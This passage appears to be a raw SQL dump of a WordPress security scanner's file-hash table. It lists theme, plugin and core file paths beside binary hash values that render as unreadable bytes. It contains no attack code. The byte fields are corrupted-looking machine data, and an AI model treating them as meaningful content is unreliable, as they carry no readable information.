�z.c�','\\�ǫ�0.��^IR�����UQ��2e@��]','',0,'?'),('���:���u֯�HW','wp-content/themes/wp-simple/parts/frontpage-action1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e8�<u����[�8�l�','Ry��\0�2�a#۰�7;6�PJ�E�a��]*��','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('��\\�M�W󶊸\r[�','wp-content/themes/Kent/FT/plugin/options-framework/js/media-uploader.js',0,'�A���@�k@VgdH','�A���@�k@VgdH','�l��k��&��Snt��m���b�̧:S���-1','',0,'?'),('��b��M��;�g*�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/tern/tern.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�e���	�Fs�','���L>�.\\c3h���>����U���NT�Z','',0,'?'),('��PI�6dzL���&ɞ','wp-content/themes/city-store/inc/settings/city-store-common-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g&`�SS��%3��}��','��A$wT�nbYT-��S35��/K:_!�R`�','',0,'?'),('��&Q}`p�4R�\"/���','wp-content/themes/graphene/template-threecolumnsleft.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&O�y�����ڭ1dE�','F��\"��z��)�G,h7�;ҭM*����','',0,'?'),('���e� ���M�P��','wp-content/themes/metro-magazine/inc/info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FB�~���\\6','E�pr1<l��X��$N��RU�7JsM35�\0','',0,'?'),('��\"��,��E���','wp-content/themes/graphene/includes/theme-setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+3&\"+,�$V3��`','������a�i�ǀW�o܋H ���-�','',0,'?'),('��m��8va;	�Q','wp-content/themes/advance/css/unminified/jquery.sidr.dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��n�rH�H\0ފh','���y�Z�?8r��&U��cКg\r�','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('��@�(_+\"�R','wp-content/themes/graphene/admin/images/template-threecolumnsright.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�	�:KPn9����9\r','L_��n��+�s�������>hm�f�oD','',0,'?'),('���6��5B��\"���','wp-content/themes/graduate/assets/plugins/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�CD�U��Ŧ','|\Z\n����\Z���hX#�k%A��喳S�','',0,'?'),('�g����s���nD','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/tern/tern.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�e���	�Fs�','���L>�.\\c3h���>����U���NT�Z','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� !�y,6��Yh���','0��Ú�1B$��Н�_@��#Xw� �p5�P','',0,'?'),('�)\"��d\r�k�Ao��d','wp-content/themes/gambit/inc/customizer/default-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��9���l|��s���','Se�狶<�����|�IK`k��@:y�U��(','',0,'?'),('�1h`�v�\'lܬ�h�I','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/tooltips.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�լ�U�\n�F,��~r','��Q���.!0V��%�����D�-��}��4','',0,'?'),('�?���؅�k��9k�Z','wp-content/themes/exoplanet/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=@_�;gQ��Ȥl�a','�&O�6�d\'�`��! R���\\��L���W}�','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�i6��xu0\\����','�s�\"9���l���+���/���[�','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�j���{*�b6�\"��','wp-content/themes/catch-responsive/inc/customizer-includes/upgrade-button/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������vT�� ���i','>*����/�6:,�M�^�F����<��ٞ\0�','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':-��q���?b׍�^�','f2\"�c`��}�`��·����֑��ѕl�o','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('����V�h��G�!�j\'','wp-content/plugins/wp-cerber/assets/flags/jm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��F/�+�d9','\n�Ƽ�H�_���T�T�2�[�_��ox�u�','',0,'?'),('����-u��T.Y�+0�','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�q~t\\m9:?Z�','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),('���^��U�9Txp�dE','wp-content/themes/skt-pathway/css/nivo-slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\Z��#������4��','3�q�2Ǘ}�)C�򄺚�$����@eD�7��','',0,'?'),('����L��6	��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��B \n�\0T�̲��\".�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/markdown-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x;V� \0E�)`� ','�0���+�5߯��2{�\Z�(�\r *�g��','',0,'?'),('��*ɱy<=��x�,�p�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/yaml/yaml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��N�8`����O�','��܌���h)I-�Dm�sR4�U�xd�F�A�','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('��k⵭�aKd��ξ','wp-admin/css/colors/ectoplasm/0.php',0,'�n��;0��ᯐF�?','�n��;0��ᯐF�?','��3�Pj_���ێ�K0{g	�V�A','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('���\"!�@�p~��t\"','wp-content/themes/authorize/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=+�|��;uCfd�S��','�7��E�6�\Z��q�ai���9+A`�_�=x�g','',0,'?'),('���#�V(k]$����(','wp-content/themes/twentynineteen/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�\"MY���~��','�lG����w��}V���>��%{n��\\�z��;�','',0,'?'),('�)�^T��K��	','wp-content/themes/advance/inc/kirki/assets/css/hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('���I	2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('����������','wp-content/themes/advance/inc/kirki/includes/class-kirki-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�˥��q�\r\'l*���','�E�(�\ru��\nP18dy��h�R�����k�q','',0,'?'),('�)9NضSA�Y\Z�֦\n','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�6��dE[�@��fB�','wp-content/themes/university-hub/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��G��,B��v�','�����*�RQ��F��Qd�/��<^�\'+�','',0,'?'),('�K�?zbY�-pӿo�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zq@)�\r_?�=�L\Z�','s��@�؜�#�h�rER0}��	A�1#Z��K�','',0,'?'),('�Mz����e!c.�Yo6,','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tr>f+2`bU�V8','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('�S�򽟈b�eL��','wp-content/plugins/wp-cerber/assets/flags/be.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZx��ʭ��T�/� �','4�nMM��e)񤉓��<�Ia�P�1�K�~#`G','',0,'?'),('�X�:��3�R��g\Z�X','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/hint/css-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�y1�Lyh��è��','\\PC\'�� ����!m��/$2�8V#B\r�9Qmԇ','',0,'?'),('�\\p�+���a=a1:P�#','wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('�d�d.�_��\\֭V[�','wp-content/themes/monograph/js/jquery.slicknav.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����*];��Y�ߢ�',',2��:&B�폢����f2,S)_��ڌ�]�x','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�|\0D�c�-��\'�\nq!�','wp-content/themes/advance/css/customcss/mobile_slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ι� ��%���kW�','	�^K���AX#�-$��X8�,�^������U','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�-I��:�����9�+','Y��z���W2|{}1и����^�iN�q�C�Y�','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j	\r�<l�J�l�','[�a6$sp8����Y�Q�\'��1��\0�Dح','',0,'?'),('��{��K�45ugX�1l','wp-content/themes/weblog/assets/library/owl-carousel/grabbing.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ۥ�]���{','Y2���c]ԅb��b����r׆jcz�xX','',0,'?'),('������pY��6��z�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��λ,�X W�:>',')L_�HIГJ��z8�r�5�r1�����V,�:','',0,'?'),('��4�\"y/��@�x4��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/settings/class-kirki-settings-default-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�9�9�`�{','�M��ef�܎>�y�e5���\\�N{$kk��','',0,'?'),('��É�NC���ܓp�j','wp-content/themes/catch-responsive/js/navigation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�c5p�U;����<b�','��2Np�},pf�(�Ƚ�tZ���M�oVg�\r','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('�ʘ��Ptl��&','wp-content/themes/education-hub/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�*ǹT�G�昖m\"�','�Rϣ���*E�^aA�L��H����Z�','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('��$���D�����','wp-content/themes/auberge/assets/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(�l�@\"�@�p','�\"O�U:��O�B��懤�^�8�A�8��ݳ','',0,'?'),('��H\0��/�S�����','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/hint/html-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�n�G;����I_�E','�ŭ�˿b�-���l#�����C	\Z��M','',0,'?'),('�|�aV��~�[f��.','wp-content/themes/twentynineteen/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�{.�b:N���,n�','�J�q[9w��!\0�|b���n�Q���\'i�M��','',0,'?'),('�k�j��ٹ\0�r�\Z�','wp-content/themes/enigma/images/newsletter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i���U�����N','��\\����D,�jT\03<H�.�wb\'P=�','',0,'?'),('�!ۅ.�4��qdtP��','wp-content/plugins/akismet/views/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ETJ�_q���n���','·^\n�b��q<v`x��K���Z�W��>�Gw��','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�&8�]=	����R','h�Q�4n��ńY�9��޿�-ǚ7F�&8���ܷ','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('�M��*���D�SH�q','wp-content/themes/monograph/template-parts/content-header-exclusive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�K��_�)e!Fs���','UD7�FV����%�� ��]4�T=p� ґ','',0,'?'),('�W��f�0�\n�D	�/\'','wp-content/plugins/wp-cerber/assets/flags/km.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%������&\'z���V',';��NS6����:����݇�u͙�r�x� ','',0,'?'),('�a�>v��\\���L��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/autorefresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�m�!���СՆ��o','A���e�?R�I\\a�ʌ���Z�Th�V�{�','',0,'?'),('�d��ou�h�X���k','wp-content/themes/catch-flames/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iz���Y��]4�&�','���F�}�Ռ���O�X����	#����#�','',0,'?'),('�r�@xp�}/�+C�j','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/multiplex_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޖ��5eW�y/��','�n�8�)r�+F��it�ڝL�yE3?)�aM�Tf\0�','',0,'?'),('�s�xJ0��8vg4��','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/radio-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B_-\rs��NJ+��','�	�2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('�z9�	�`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('���*r%Y�3/�hN�p','wp-content/plugins/wp-cerber/assets/flags/sb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�5J��䈒?Qo�<','����T�	k��w#�����Af�3A2�͂M','',0,'?'),('���~�)��M&=X(rU','wp-content/themes/metro-magazine/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�Zp*^X���L��','�F�zL�)6/���6��*\'�/a�Z�� �i��','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('��DE�6��T�o?�','wp-content/themes/graphene/images/social/shoutwire.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\r�����yL��iE�','�n��:8�M\0j�hiKUCkJ/z@Q�)A,�A','',0,'?'),('��w�#�Q������','wp-content/plugins/akismet/views/predefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>ajϬa�����4�','�w�s��bN}�qY��7zo�U��u�\'���1','',0,'?'),('���:\r���eT���c8','wp-content/themes/simpleshift/inc/pro/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���	#\0��oPM5','M�4͖��%O�N���K)E�?�(I5��,','',0,'?'),('��I�����_�R��A�','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_icons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޟ�B�a���OB�k�0','���T1B��!�T�a��Jz����m��!Ąy(','',0,'?'),('��^Y��v�gݭ4�CC','wp-content/themes/wp-simple/inc/kirki/kirki/includes/lib/class-aricolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�8\\@s����','��7\n�DQ��Kx���o%�&)�b�@;�e��ö','',0,'?'),('��	�ҵ܀v��]�Յ�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/meta.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>.�3+A�^��:{��C','��;w����-l8w�1\\��s&mB�@7�s$���','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,k�)����X','��>��|F��j�e�<;E�Tr�ۭe��wO','',0,'?'),('������ ,trd�^�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��~&�����\n��G','�Z�\"Et�o�TK@NB5�!��Ϣp�d','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('��qR?�UH�#W˱','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/yaml/yaml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��N�8`����O�','��܌���h)I-�Dm�sR4�U�xd�F�A�','',0,'?'),('�	v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('�	ļ\0@�)���J','wp-content/themes/hitmag/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�PS�\'��Z5�Z}��','���qa#T0��T�n=���8X\n�Bg%΀L�','',0,'?'),('����	?��r��','wp-content/themes/education-hub/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q_v�+,��p}��','l,�՞\n~���8]w4��]�8�\06��?kc','',0,'?'),('�*\0�U\'-,�M�','wp-content/themes/twentynineteen/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=#kQ\n�z��݋C','�uC���#ďAUf{Kb�|�\ZIl�L���٩','',0,'?'),('�9��O����^9�a�','wp-content/themes/simpleshift/inc/kirki/includes/scripts/class-kirki-scripts-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':^��֓��!B��m�','��P�(�Y`���A�[b�v�z>з3w\n','',0,'?'),('�E>E�Ϟ�\Z�\0@B�:','wp-content/themes/hemingway/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��od���r��/��','%�Y��i�u�5��y��d�����s�HRnsX�O','',0,'?'),('�E����aq�܈��G','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/css-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	���>���WB�n�','4��ɉ]@���(�C�z��\"�{�\rt�_��U','',0,'?'),('�F��J��:�Oq�T','wp-content/themes/advance/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lz���`��\r9��','i>�-���JU:k�?����eB�\r�x�g�','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�^1#�>8��ε#\\J�','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/color.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.d>G�\0�kN/G','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('�h�GF6<J�)Vh�G�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/keymap/sublime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�\'^d�U��Sa���','�=u�Ӭd�Z4��/�[ƀ�L�ǃ\"��)�]S�H','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('�p �Z��ۑ�p�]','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����XP\0c��O�O�','n��J\Z,8��Y8{\0R��f��m�~���QɹZ','',0,'?'),('��`	-V+и��m','wp-content/themes/graphene/admin/admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��c\n?�p��\n`','�N�_֞�C��<��:7T�Ύxq4���h�','',0,'?'),('������yg\'�u�','wp-content/themes/singularity/inc/functions-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�tlqH��ɧ�q�','����~fx���3�?�����\n���xK','',0,'?'),('��pdW��MpľWSn�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��3�F�0�QX#~','��U&\'���j+w�S���ja�v��ؗbo�','',0,'?'),('��6��:�$4�-Tg5','wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��	���L`򊘖B[','���V\"��\ZkY�cnUkYY$-,��y�\r�','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ˆ�gJ��^<','���\ZybF���v��J�}�z��Lj��	(','',0,'?'),('��+`ӥn���ƒ�l','wp-content/themes/advance/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �M|��d��|r�\\�','�K�[U�<�\"��%k��d�IA;X�0ecU��f','',0,'?'),('�����\\<.$\r����','wp-content/themes/wp-simple/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r��N��ݸ�x.','���\0��}�	<�r��n�i�9{���c����','',0,'?'),('��t�F�� �-�߄','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/multiplex.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�f��P��\Z','Ւ�AG�Fy��#�&�T�X���!�','',0,'?'),('���G������V�3?','wp-content/themes/gambit/inc/widgets/widget-magazine-posts-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C]n���,�0N�3�','<�.��x���kf�NGu!�?!ea�ת�X8�','',0,'?'),('����P�l��R���','wp-content/themes/quicksand/js/fitvids.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����J%��~;e��','��>C�!མh���{Ӎ|SR���WsS���#�','',0,'?'),('��W6���ꤱ�#��m','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��\'���[��4 �','k�[�?��2��8n�h���C�Z2���DL9O��','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��]&?��I*1�e','�s������Wk�B��$oG��N��\n���','',0,'?'),('��&